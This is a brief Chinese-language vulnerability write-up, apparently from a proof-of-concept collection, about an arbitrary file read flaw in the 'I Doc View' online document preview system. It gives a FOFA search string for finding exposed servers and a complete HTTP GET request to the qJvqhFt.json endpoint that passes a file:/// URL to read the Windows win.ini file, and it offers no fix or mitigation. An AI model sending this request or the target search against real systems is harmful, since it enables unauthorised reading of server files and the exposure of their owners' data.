简介
I Doc View在线文档预览是一款在线文档预览系统,旨在提供便捷的文件查看和编辑服务。
漏洞描述
I Doc View在线文档预览qJvqhFt.json接口存在任意文件读取漏洞
影响范围
I Doc View
Fofa:
title=="在线文档预览 - I Doc View"
漏洞复现
GET /view/qJvqhFt.json?start=1&size=5&url=file%3A%2F%2F%2FC%3A%2Fwindows%2Fwin.ini&idocv_auth=sapi HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0